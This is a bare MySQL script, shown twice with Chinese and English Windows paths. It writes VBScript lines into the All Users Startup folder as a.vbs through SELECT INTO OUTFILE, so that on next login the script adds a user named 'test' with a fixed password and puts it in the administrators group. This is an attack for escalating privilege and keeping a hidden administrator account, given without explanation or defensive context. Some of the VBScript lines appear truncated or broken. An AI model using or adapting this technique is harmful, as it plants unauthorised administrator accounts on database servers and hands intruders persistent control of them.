

use test;
create table a (cmd text);
insert into a values (“set wshshell=createobject (“”””) ” );
insert into a values (“ (“”cmd.exe /c net user test 123!@#abcABC /add””,0) ” );
insert into a values (“ (“”cmd.exe /c net localgroup administrators test /add””,0) ” );
select * from a into outfile “C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\a.vbs”;
drop table a;
use test;
create table a (cmd text);
insert into a values (“set wshshell=createobject (“”””) ” );
insert into a values (“ (“”cmd.exe /c net user test 123!@#abcABC /add””,0) ” );
insert into a values (“ (“”cmd.exe /c net localgroup administrators test /add””,0) ” );
select * from a into outfile “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.vbs”;
drop table a;


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